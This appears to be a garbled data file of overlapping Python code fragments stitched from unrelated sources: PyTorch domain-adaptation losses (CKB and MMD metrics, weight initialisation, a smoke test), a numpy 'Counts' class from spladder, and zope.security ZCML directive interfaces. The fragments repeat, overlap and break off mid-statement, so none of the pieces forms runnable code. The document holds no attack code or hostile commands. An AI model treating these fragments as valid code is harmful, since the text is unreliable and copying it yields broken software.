torch.nn.init.normal_(m.weight, 1.0, 0.02) torch.nn.init.zeros_(m.bias) elif classname.find('Linear') !=", "= (H_s.mm(K_YsYs)).mm(H_s) G_Yt = (H_t.mm(K_YtYt)).mm(H_t) G_Zs = (H_s.mm(K_ZsZs)).mm(H_s) G_Zt = (H_t.mm(K_ZtZt)).mm(H_t) #====== R_{s}", "0.02) m.bias.data.fill_(0) elif classname.find('Linear') != -1: m.weight.data.normal_(0.0, 0.05) m.bias.data.fill_(0) def weights_init_kaiming(m): classname =", "optimizer, iter_num, gamma, power, init_lr=0.001, weight_decay=0.0005): \"\"\"Decay learning rate by a factor of", "iter_num) ** (-power) i = 0 for param_group in optimizer.param_groups: param_group['lr'] = lr", "-\\ 2*torch.mm(prob_s,prob_s.t()) D_XtXt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_XtXs = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\", "* (1 + gamma * iter_num) ** (-power) i = 0 for param_group", "################################## # Cross-Entropy Loss NLL_loss = torch.nn.NLLLoss().cuda() def Cross_Entropy(prob,lab): CE_loss = NLL_loss(torch.log(prob+1e-4), lab)", "= (B_t + B_t.t())/2 # numerical symmetrize S_s, U_s = B_s.symeig(eigenvectors=True) S_t, U_t", "CKB_type='soft'): # Y: label, Z: fea, matching conditional distribution P(Z|Y) num_sam_s = fea_s.shape[0]", "-\\ 2*torch.mm(prob_t,prob_t.t()) D_XtXs = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_s.t()) sigma_XsXs = D_XsXs.mean().detach() sigma_XtXt", "!= -1 or classname.find('ConvTranspose2d') != -1: torch.nn.init.kaiming_uniform_(m.weight) torch.nn.init.zeros_(m.bias) elif classname.find('BatchNorm') != -1: 
torch.nn.init.normal_(m.weight,", "torch.autograd import Variable import sys ################################## # Network & Variable ################################## def weights_init(m):", "D_XtXt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_XtXs = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\", "elif classname.find('BatchNorm') != -1: m.weight.data.normal_(1.0, 0.02) m.bias.data.fill_(0) elif classname.find('Linear') != -1: m.weight.data.normal_(0.0, 0.05)", "sigma_ZtZt = D_ZtZt.mean().detach() sigma_ZtZs = D_ZtZs.mean().detach() K_YsYs = (-D_YsYs/sigma_YsYs).exp() K_YtYt = (-D_YtYt/sigma_YtYt).exp() K_ZsZs", "weights_init(m): \"\"\"Initialize network parameters.\"\"\" classname = m.__class__.__name__ if classname.find('Conv') != -1: m.weight.data.normal_(0.0, 0.05)", "D_ZtZs.mean().detach() K_YsYs = (-D_YsYs/sigma_YsYs).exp() K_YtYt = (-D_YtYt/sigma_YtYt).exp() K_ZsZs = (-D_ZsZs/sigma_ZsZs).exp() K_ZtZt = (-D_ZtZt/sigma_ZtZt).exp()", "sigma_YtYt = D_YtYt.mean().detach() sigma_ZsZs = D_ZsZs.mean().detach() sigma_ZtZt = D_ZtZt.mean().detach() sigma_ZtZs = D_ZtZs.mean().detach() K_YsYs", "x.cuda() return Variable(x) def to_data(x): \"\"\"Convert variable to numpy.\"\"\" if torch.cuda.is_available(): x =", "-1: m.weight.data.normal_(0.0, 0.05) elif classname.find('BatchNorm') != -1: m.weight.data.normal_(1.0, 0.02) m.bias.data.fill_(0) elif classname.find('Linear') !=", "= torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach() if CKB_type == 'hard': prob_t = torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach() elif CKB_type == 'soft':", "+ gamma * iter_num) ** (-power) i = 0 for param_group in optimizer.param_groups:", "Centering Matrix ======= H_s = ( torch.eye(num_sam_s) - torch.ones(num_sam_s)/num_sam_s ).cuda() H_t = (", "loss def CKB_Metric(fea_s, fea_t, lab_s, plab_t, prob_t, num_cls, epsilon=1e-2, CKB_type='soft'): # Y: label,", "return CE_loss # Entropy Loss def Entropy(prob): num_sam = prob.shape[0] Entropy = -(prob.mul(prob.log()+1e-4)).sum()", "======= H_s = ( torch.eye(num_sam_s) - torch.ones(num_sam_s)/num_sam_s ).cuda() H_t = ( torch.eye(num_sam_t) -", "Entropy(prob): num_sam = prob.shape[0] Entropy = -(prob.mul(prob.log()+1e-4)).sum() return Entropy/num_sam # CKB loss def" ]
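
# A minimal smoke-test sketch (an addition, not part of the original file):
# random batches exercise CKB_Metric and MMD_Metric end-to-end. It assumes a
# CUDA device (the losses above hard-code .cuda()) and a PyTorch version that
# still provides Tensor.symeig, matching the API used in CKB_Metric; the
# batch size, feature dimension, and class count below are arbitrary.
if __name__ == '__main__':
    batch, dim, num_cls = 32, 256, 10
    fea_s = torch.randn(batch, dim).cuda()              # source features
    fea_t = torch.randn(batch, dim).cuda()              # target features
    lab_s = torch.randint(0, num_cls, (batch,)).cuda()  # source labels
    prob_s = torch.softmax(torch.randn(batch, num_cls), dim=1).cuda()
    prob_t = torch.softmax(torch.randn(batch, num_cls), dim=1).cuda()
    plab_t = prob_t.max(1)[1]                           # target pseudo-labels
    print('CKB:', CKB_Metric(fea_s, fea_t, lab_s, plab_t, prob_t, num_cls).item())
    print('MMD:', MMD_Metric(prob_s, prob_t).item())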
[ "import numpy as np class Counts: def __init__(self, seg_num): self.segments = np.zeros((seg_num,), dtype='float')", "__init__(self, seg_num): self.segments = np.zeros((seg_num,), dtype='float') self.seg_pos = np.zeros((seg_num,), dtype='float') self.edges = np.zeros((0,", "def __init__(self, seg_num): self.segments = np.zeros((seg_num,), dtype='float') self.seg_pos = np.zeros((seg_num,), dtype='float') self.edges =", "seg_num): self.segments = np.zeros((seg_num,), dtype='float') self.seg_pos = np.zeros((seg_num,), dtype='float') self.edges = np.zeros((0, 2),", "<filename>spladder/classes/counts.py import numpy as np class Counts: def __init__(self, seg_num): self.segments = np.zeros((seg_num,),", "numpy as np class Counts: def __init__(self, seg_num): self.segments = np.zeros((seg_num,), dtype='float') self.seg_pos", "as np class Counts: def __init__(self, seg_num): self.segments = np.zeros((seg_num,), dtype='float') self.seg_pos =", "np class Counts: def __init__(self, seg_num): self.segments = np.zeros((seg_num,), dtype='float') self.seg_pos = np.zeros((seg_num,),", "class Counts: def __init__(self, seg_num): self.segments = np.zeros((seg_num,), dtype='float') self.seg_pos = np.zeros((seg_num,), dtype='float')", "Counts: def __init__(self, seg_num): self.segments = np.zeros((seg_num,), dtype='float') self.seg_pos = np.zeros((seg_num,), dtype='float') self.edges", "self.segments = np.zeros((seg_num,), dtype='float') self.seg_pos = np.zeros((seg_num,), dtype='float') self.edges = np.zeros((0, 2), dtype='float')" ]
[ "= zope.configuration.fields.MessageID( title=_(\"Description\"), description=_(\"Longer narrative description of what this\" \" factory does\"), required=False,", "content directive's 'class' attribute.\"\"\"), required=False, ) title = zope.configuration.fields.MessageID( title=_(\"Title\"), description=_(\"Text suitable for", "= zope.configuration.fields.GlobalObject( title=_(\"Configure like this class\"), description=_(\"\"\" This argument says that this content", "THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED", "for this factory in the ZMI factory identification scheme. If not given, defaults", "required=True, value_type=zope.configuration.fields.GlobalInterface() ) class IRequireSubdirective(zope.interface.Interface): \"\"\"Indicate that the a specified list of names", "any names provided directly in the attributes attribute or any names defined by", "the class to be publicly viewable (that is, requires the zope.Public permission). Only", "identification scheme. If not given, defaults to the literal string given as the", "GlobalObject, GlobalInterface from zope.configuration.fields import Tokens, PythonIdentifier import zope.interface import zope.schema from zope.interface", "This argument says that this content class should be configured in the same", "required to access or mutate the attributes and methods specified.\"\"\"), required=False, ) attributes", "INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST", "is. If this argument is specified, no other argument can be used.\"\"\"), required=False,", "the \" u\"interface(s). Multiple interfaces can be supplied.\"), value_type=GlobalInterface(), required=False) class IRequire(Interface): \"\"\"Require", "methods and attributes\" \" can be accessed.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) set_schema = zope.configuration.fields.Tokens(", "used.\"\"\"), required=False, ) class IAllowSubdirective(zope.interface.Interface): \"\"\" Declare a part of the class to", "modified/mutated.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) like_class = zope.configuration.fields.GlobalObject( title=_(\"Configure like this class\"), description=_(\"\"\" This", "title=_(\"ID\"), description=_(\"\"\" the identifier for this factory in the ZMI factory identification scheme.", "= 'restructuredtext' import zope.configuration.fields from zope.configuration.fields import GlobalObject, GlobalInterface from zope.configuration.fields import Tokens,", "value_type=PythonIdentifier(), required=False) permission = Permission( title=u\"Permission ID\", description=u\"The ID of the permission to", "methods\" \" that can be accessed.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) set_attributes = zope.configuration.fields.Tokens( title=_(\"Attributes", "can be accessed.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) set_schema = zope.configuration.fields.Tokens( title=_(\"The attributes specified by", "PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED # WARRANTIES ARE", "NOT LIMITED TO, THE IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND", "(that is, requires the zope.Public permission). Only one of the following two attributes", "ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF TITLE,", "OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS # FOR A PARTICULAR PURPOSE. 
#", "required=False, ) description = zope.configuration.fields.MessageID( title=_(\"Description\"), description=_(\"Longer narrative description of what this\" \"", "= zope.configuration.fields.GlobalObject( title=_(\"Class\"), required=True ) class IImplementsSubdirective(zope.interface.Interface): \"\"\"Declare that the class given by", "attributes = zope.configuration.fields.Tokens( title=_(\"Attributes\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interface\"), required=False, value_type=zope.configuration.fields.GlobalInterface(),", "\"\"\"Group security declarations about a module\"\"\" module = GlobalObject( title=u\"Module\", description=u\"Pointer to the", "the provisions of the Zope Public License, # Version 2.1 (ZPL). A copy", "set\"), description=_(\"The listed schemas' properties can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) like_class", "defaults to the literal string given as the content directive's 'class' attribute.\"\"\"), required=False,", "zope.configuration.fields.Tokens( title=_(\"Attributes\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interface\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) class", "same way the specified class' security is. If this argument is specified, no", "accessed.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) set_attributes = zope.configuration.fields.Tokens( title=_(\"Attributes that can be set\"), description=_(\"This", "like this class\"), description=_(\"\"\" This argument says that this content class should be", "names provided directly in the attributes attribute or any names defined by interfaces", "the attributes attribute or any names defined by interfaces listed in the interface", "way the specified class' security is. If this argument is specified, no other", "title=_(\"Interface\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) class IFactorySubdirective(zope.interface.Interface): \"\"\"Specify the factory used to create this", "GlobalInterface from zope.configuration.fields import Tokens, PythonIdentifier import zope.interface import zope.schema from zope.interface import", "title=_(\"Title\"), description=_(\"Text suitable for use in the 'add content' menu\" \" of a", "content' menu\" \" of a management interface\"), required=False, ) description = zope.configuration.fields.MessageID( title=_(\"Description\"),", "Access \" u\"will be provided to all of the names defined by the", "unconditionally allowed to any names provided directly in the attributes attribute or to", "# ############################################################################## \"\"\"Component architecture related 'zope' ZCML namespace directive interfaces \"\"\" __docformat__ =", "the interface attribute. \"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to require permission", "title=_(\"Attributes that can be set\"), description=_(\"This is a list of attributes that can", "publicly viewable (that is, requires the zope.Public permission). Only one of the following", "the names in a given Interface require a given permission for access. 
\"\"\"", "names or the names in a given Interface require a given permission for", "attributes to provide access to.\", value_type=PythonIdentifier(), required=False) interface = Tokens( title=u\"Interface\", description=(u\"Interfaces whos", "specified by the schema can be set\"), description=_(\"The listed schemas' properties can be\"", "listed interfaces' methods and attributes\" \" can be accessed.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) set_schema", "zope.configuration.fields.Tokens( title=_(\"The attributes specified by the schema can be set\"), description=_(\"The listed schemas'", "directive's class attribute implements a given interface \"\"\" interface = zope.configuration.fields.Tokens( title=_(\"One or", "directly in the attributes attribute or any names defined by interfaces listed in", "Contributors. # All Rights Reserved. # # This software is subject to the", "description=u\"The attributes to require permission for.\", value_type=PythonIdentifier(), required=False) permission = Permission( title=u\"Permission ID\",", "description=_(\"The listed interfaces' methods and attributes\" \" can be accessed.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), )", "id that will be required to access or mutate the attributes and methods", "statements about a class\"\"\" class_ = zope.configuration.fields.GlobalObject( title=_(\"Class\"), required=True ) class IImplementsSubdirective(zope.interface.Interface): \"\"\"Declare", "AND ANY AND ALL EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING, BUT", "as _ from zope.security.zcml import Permission class IClassDirective(zope.interface.Interface): \"\"\"Make statements about a class\"\"\"", "a list of attributes and methods\" \" that can be accessed.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(),", "= zope.configuration.fields.Tokens( title=_(\"Attributes and methods\"), description=_(\"This is a list of attributes and methods\"", "value_type=zope.configuration.fields.GlobalInterface(), ) class IFactorySubdirective(zope.interface.Interface): \"\"\"Specify the factory used to create this content object\"\"\"", "AND ALL EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED", "attribute. \"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to provide access to.\", value_type=PythonIdentifier(),", "= zope.configuration.fields.MessageID( title=_(\"Title\"), description=_(\"Text suitable for use in the 'add content' menu\" \"", "interface = zope.configuration.fields.Tokens( title=_(\"Interface\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) class IFactorySubdirective(zope.interface.Interface): \"\"\"Specify the factory used", "class IImplementsSubdirective(zope.interface.Interface): \"\"\"Declare that the class given by the content directive's class attribute", "value_type=zope.configuration.fields.GlobalInterface() ) class IRequireSubdirective(zope.interface.Interface): \"\"\"Indicate that the a specified list of names or", "be provided to all of the names defined by the \" u\"interface(s). Multiple", "not given, defaults to the literal string given as the content directive's 'class'", "# All Rights Reserved. # # This software is subject to the provisions", "= Tokens( title=u\"Interface\", description=(u\"Interfaces whos names to provide access to. Access \" u\"will", "IS\" AND ANY AND ALL EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING,", "access to. 
Access \" u\"will be provided to all of the names defined", "scheme. If not given, defaults to the literal string given as the content", "to the provisions of the Zope Public License, # Version 2.1 (ZPL). A", "THE IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS # FOR", "zope.configuration.fields.Tokens( title=_(\"Attributes and methods\"), description=_(\"This is a list of attributes and methods\" \"", "attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to provide access to.\", value_type=PythonIdentifier(), required=False) interface", "to provide access to. Access \" u\"will be provided to all of the", "this argument is specified, no other argument can be used.\"\"\"), required=False, ) class", "that the a specified list of names or the names in a given", "be publicly viewable (that is, requires the zope.Public permission). Only one of the", "be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interfaces\"), description=_(\"The listed interfaces'", "the ZPL should accompany this distribution. # THIS SOFTWARE IS PROVIDED \"AS IS\"", "argument is specified, no other argument can be used.\"\"\"), required=False, ) class IAllowSubdirective(zope.interface.Interface):", "names defined by interfaces listed in the interface attribute. \"\"\" attributes = Tokens(", "is subject to the provisions of the Zope Public License, # Version 2.1", ") class IRequireSubdirective(zope.interface.Interface): \"\"\"Indicate that the a specified list of names or the", "or mutate the attributes and methods specified.\"\"\"), required=False, ) attributes = zope.configuration.fields.Tokens( title=_(\"Attributes", "used. \"\"\" attributes = zope.configuration.fields.Tokens( title=_(\"Attributes\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interface\"),", "attributes\" \" can be accessed.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) set_schema = zope.configuration.fields.Tokens( title=_(\"The attributes", "management interface\"), required=False, ) description = zope.configuration.fields.MessageID( title=_(\"Description\"), description=_(\"Longer narrative description of what", "required=False) interface = Tokens( title=u\"Interface\", description=(u\"Interfaces whos names to provide access to. Access", "content directive's class attribute implements a given interface \"\"\" interface = zope.configuration.fields.Tokens( title=_(\"One", "ZMI factory identification scheme. If not given, defaults to the literal string given", "this content class should be configured in the same way the specified class'", "Rights Reserved. # # This software is subject to the provisions of the", "implements a given interface \"\"\" interface = zope.configuration.fields.Tokens( title=_(\"One or more interfaces\"), required=True,", "FITNESS # FOR A PARTICULAR PURPOSE. # ############################################################################## \"\"\"Component architecture related 'zope' ZCML", "modified/mutated.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interfaces\"), description=_(\"The listed interfaces' methods and", "in the interface attribute. 
\"\"\" attributes = Tokens( title=u\"Attributes\", description=u\"The attributes to provide", "\"\"\" Declare a part of the class to be publicly viewable (that is,", "= zope.security.zcml.Permission( title=_(\"Permission\"), description=_(\"\"\" Specifies the permission by id that will be required", "Interface import zope.security.zcml from zope.security.i18n import ZopeMessageFactory as _ from zope.security.zcml import Permission", "class given by the content directive's class attribute implements a given interface \"\"\"", "title=_(\"Attributes\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interface\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) class IFactorySubdirective(zope.interface.Interface):", "from zope.security.zcml import Permission class IClassDirective(zope.interface.Interface): \"\"\"Make statements about a class\"\"\" class_ =", "\"\"\"Indicate that the a specified list of names or the names in a", "interfaces can be supplied.\"), value_type=GlobalInterface(), required=False) class IRequire(Interface): \"\"\"Require a permission to access", "permission to access selected module attributes The given permission is required to access", "be required to access or mutate the attributes and methods specified.\"\"\"), required=False, )", "can be used.\"\"\"), required=False, ) class IAllowSubdirective(zope.interface.Interface): \"\"\" Declare a part of the", "this\" \" factory does\"), required=False, ) class IModule(Interface): \"\"\"Group security declarations about a", "list of attributes and methods\" \" that can be accessed.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), )", "\"\"\"Make statements about a class\"\"\" class_ = zope.configuration.fields.GlobalObject( title=_(\"Class\"), required=True ) class IImplementsSubdirective(zope.interface.Interface):", "does\"), required=False, ) class IModule(Interface): \"\"\"Group security declarations about a module\"\"\" module =", "# # This software is subject to the provisions of the Zope Public", "can be supplied.\"), value_type=GlobalInterface(), required=False) class IRequire(Interface): \"\"\"Require a permission to access selected", "permission for access. \"\"\" permission = zope.security.zcml.Permission( title=_(\"Permission\"), description=_(\"\"\" Specifies the permission by", "PURPOSE. # ############################################################################## \"\"\"Component architecture related 'zope' ZCML namespace directive interfaces \"\"\" __docformat__", "interfaces' methods and attributes\" \" can be accessed.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) set_schema =", "by id that will be required to access or mutate the attributes and", "# This software is subject to the provisions of the Zope Public License,", "u\"will be provided to all of the names defined by the \" u\"interface(s).", "requires the zope.Public permission). 
Only one of the following two attributes may be", "required=False) permission = Permission( title=u\"Permission ID\", description=u\"The ID of the permission to require.\")", "attributes that can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interfaces\"),", "listed schemas' properties can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) like_class = zope.configuration.fields.GlobalObject(", "LIMITED TO, THE IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS", "\"\"\"Declare that the class given by the content directive's class attribute implements a", "content object\"\"\" id = zope.schema.Id( title=_(\"ID\"), description=_(\"\"\" the identifier for this factory in", "class IAllow(Interface): \"\"\"Allow access to selected module attributes Access is unconditionally allowed to", "description of what this\" \" factory does\"), required=False, ) class IModule(Interface): \"\"\"Group security", "required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interface\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) class IFactorySubdirective(zope.interface.Interface): \"\"\"Specify", "\"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED,", "accompany this distribution. # THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND", "the content directive's 'class' attribute.\"\"\"), required=False, ) title = zope.configuration.fields.MessageID( title=_(\"Title\"), description=_(\"Text suitable", "one of the following two attributes may be used. \"\"\" attributes = zope.configuration.fields.Tokens(", "selected module attributes The given permission is required to access any names provided", "\"\"\"Allow access to selected module attributes Access is unconditionally allowed to any names", "\" can be accessed.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) set_schema = zope.configuration.fields.Tokens( title=_(\"The attributes specified", "\"\"\" __docformat__ = 'restructuredtext' import zope.configuration.fields from zope.configuration.fields import GlobalObject, GlobalInterface from zope.configuration.fields", "security is. If this argument is specified, no other argument can be used.\"\"\"),", "to.\", value_type=PythonIdentifier(), required=False) interface = Tokens( title=u\"Interface\", description=(u\"Interfaces whos names to provide access", "the same way the specified class' security is. If this argument is specified,", "suitable for use in the 'add content' menu\" \" of a management interface\"),", "zope.security.i18n import ZopeMessageFactory as _ from zope.security.zcml import Permission class IClassDirective(zope.interface.Interface): \"\"\"Make statements", "software is subject to the provisions of the Zope Public License, # Version", "object\"\"\" id = zope.schema.Id( title=_(\"ID\"), description=_(\"\"\" the identifier for this factory in the", "attribute or any names defined by interfaces listed in the interface attribute. 
\"\"\"", "\" factory does\"), required=False, ) class IModule(Interface): \"\"\"Group security declarations about a module\"\"\"", "can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) like_class = zope.configuration.fields.GlobalObject( title=_(\"Configure like this", "a part of the class to be publicly viewable (that is, requires the", "import ZopeMessageFactory as _ from zope.security.zcml import Permission class IClassDirective(zope.interface.Interface): \"\"\"Make statements about", "class' security is. If this argument is specified, no other argument can be", "= Tokens( title=u\"Attributes\", description=u\"The attributes to require permission for.\", value_type=PythonIdentifier(), required=False) permission =", "value_type=zope.configuration.fields.GlobalInterface(), ) set_schema = zope.configuration.fields.Tokens( title=_(\"The attributes specified by the schema can be", "factory does\"), required=False, ) class IModule(Interface): \"\"\"Group security declarations about a module\"\"\" module", "Public License, # Version 2.1 (ZPL). A copy of the ZPL should accompany", "2.1 (ZPL). A copy of the ZPL should accompany this distribution. # THIS", "be configured in the same way the specified class' security is. If this", "description=(u\"Interfaces whos names to provide access to. Access \" u\"will be provided to", "menu\" \" of a management interface\"), required=False, ) description = zope.configuration.fields.MessageID( title=_(\"Description\"), description=_(\"Longer", "by the content directive's class attribute implements a given interface \"\"\" interface =", "this factory in the ZMI factory identification scheme. If not given, defaults to", ") class IModule(Interface): \"\"\"Group security declarations about a module\"\"\" module = GlobalObject( title=u\"Module\",", "about a module\"\"\" module = GlobalObject( title=u\"Module\", description=u\"Pointer to the module object.\", required=True)", "\"\"\" attributes = zope.configuration.fields.Tokens( title=_(\"Attributes\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interface\"), required=False,", "that the class given by the content directive's class attribute implements a given", "zope.schema from zope.interface import Interface import zope.security.zcml from zope.security.i18n import ZopeMessageFactory as _", "interface = Tokens( title=u\"Interface\", description=(u\"Interfaces whos names to provide access to. Access \"", "and methods\"), description=_(\"This is a list of attributes and methods\" \" that can", "properties can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) like_class = zope.configuration.fields.GlobalObject( title=_(\"Configure like", "in the ZMI factory identification scheme. 
If not given, defaults to the literal", "from zope.security.i18n import ZopeMessageFactory as _ from zope.security.zcml import Permission class IClassDirective(zope.interface.Interface): \"\"\"Make", ") set_attributes = zope.configuration.fields.Tokens( title=_(\"Attributes that can be set\"), description=_(\"This is a list", "of the class to be publicly viewable (that is, requires the zope.Public permission).", "argument says that this content class should be configured in the same way", "= zope.configuration.fields.Tokens( title=_(\"Interface\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) class IFactorySubdirective(zope.interface.Interface): \"\"\"Specify the factory used to", "title=_(\"Permission\"), description=_(\"\"\" Specifies the permission by id that will be required to access", "description=_(\"This is a list of attributes and methods\" \" that can be accessed.\"),", "= zope.schema.Id( title=_(\"ID\"), description=_(\"\"\" the identifier for this factory in the ZMI factory", "should be configured in the same way the specified class' security is. If", "related 'zope' ZCML namespace directive interfaces \"\"\" __docformat__ = 'restructuredtext' import zope.configuration.fields from", "zope.configuration.fields import GlobalObject, GlobalInterface from zope.configuration.fields import Tokens, PythonIdentifier import zope.interface import zope.schema", "specified, no other argument can be used.\"\"\"), required=False, ) class IAllowSubdirective(zope.interface.Interface): \"\"\" Declare", "be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) like_class = zope.configuration.fields.GlobalObject( title=_(\"Configure like this class\"),", "access to.\", value_type=PythonIdentifier(), required=False) interface = Tokens( title=u\"Interface\", description=(u\"Interfaces whos names to provide", "is required to access any names provided directly in the attributes attribute or", "security declarations about a module\"\"\" module = GlobalObject( title=u\"Module\", description=u\"Pointer to the module", "module = GlobalObject( title=u\"Module\", description=u\"Pointer to the module object.\", required=True) class IAllow(Interface): \"\"\"Allow", "SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED #", "\"\"\" permission = zope.security.zcml.Permission( title=_(\"Permission\"), description=_(\"\"\" Specifies the permission by id that will", "given interface \"\"\" interface = zope.configuration.fields.Tokens( title=_(\"One or more interfaces\"), required=True, value_type=zope.configuration.fields.GlobalInterface() )", "= zope.configuration.fields.Tokens( title=_(\"Attributes\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interface\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), )", "of attributes and methods\" \" that can be accessed.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) set_attributes", "required=False, ) title = zope.configuration.fields.MessageID( title=_(\"Title\"), description=_(\"Text suitable for use in the 'add", "title=_(\"The attributes specified by the schema can be set\"), description=_(\"The listed schemas' properties", "IImplementsSubdirective(zope.interface.Interface): \"\"\"Declare that the class given by the content directive's class attribute implements", "be set\"), description=_(\"The listed schemas' properties can be\" \" 
modified/mutated.\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), )", "other argument can be used.\"\"\"), required=False, ) class IAllowSubdirective(zope.interface.Interface): \"\"\" Declare a part", "given as the content directive's 'class' attribute.\"\"\"), required=False, ) title = zope.configuration.fields.MessageID( title=_(\"Title\"),", "a class\"\"\" class_ = zope.configuration.fields.GlobalObject( title=_(\"Class\"), required=True ) class IImplementsSubdirective(zope.interface.Interface): \"\"\"Declare that the", "access to selected module attributes Access is unconditionally allowed to any names provided", "value_type=zope.configuration.fields.GlobalInterface(), ) like_class = zope.configuration.fields.GlobalObject( title=_(\"Configure like this class\"), description=_(\"\"\" This argument says", "required=False) class IRequire(Interface): \"\"\"Require a permission to access selected module attributes The given", "Interface require a given permission for access. \"\"\" permission = zope.security.zcml.Permission( title=_(\"Permission\"), description=_(\"\"\"", "permission). Only one of the following two attributes may be used. \"\"\" attributes", "value_type=PythonIdentifier(), required=False) interface = Tokens( title=u\"Interface\", description=(u\"Interfaces whos names to provide access to.", "any names provided directly in the attributes attribute or to any names defined", "to access selected module attributes The given permission is required to access any", "'zope' ZCML namespace directive interfaces \"\"\" __docformat__ = 'restructuredtext' import zope.configuration.fields from zope.configuration.fields", "value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interface\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) class IFactorySubdirective(zope.interface.Interface): \"\"\"Specify the", "interface \"\"\" interface = zope.configuration.fields.Tokens( title=_(\"One or more interfaces\"), required=True, value_type=zope.configuration.fields.GlobalInterface() ) class", "the permission by id that will be required to access or mutate the", "directive interfaces \"\"\" __docformat__ = 'restructuredtext' import zope.configuration.fields from zope.configuration.fields import GlobalObject, GlobalInterface", "class IRequire(Interface): \"\"\"Require a permission to access selected module attributes The given permission", "from zope.interface import Interface import zope.security.zcml from zope.security.i18n import ZopeMessageFactory as _ from", "Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution. #", "'add content' menu\" \" of a management interface\"), required=False, ) description = zope.configuration.fields.MessageID(", "description = zope.configuration.fields.MessageID( title=_(\"Description\"), description=_(\"Longer narrative description of what this\" \" factory does\"),", "title=u\"Interface\", description=(u\"Interfaces whos names to provide access to. 
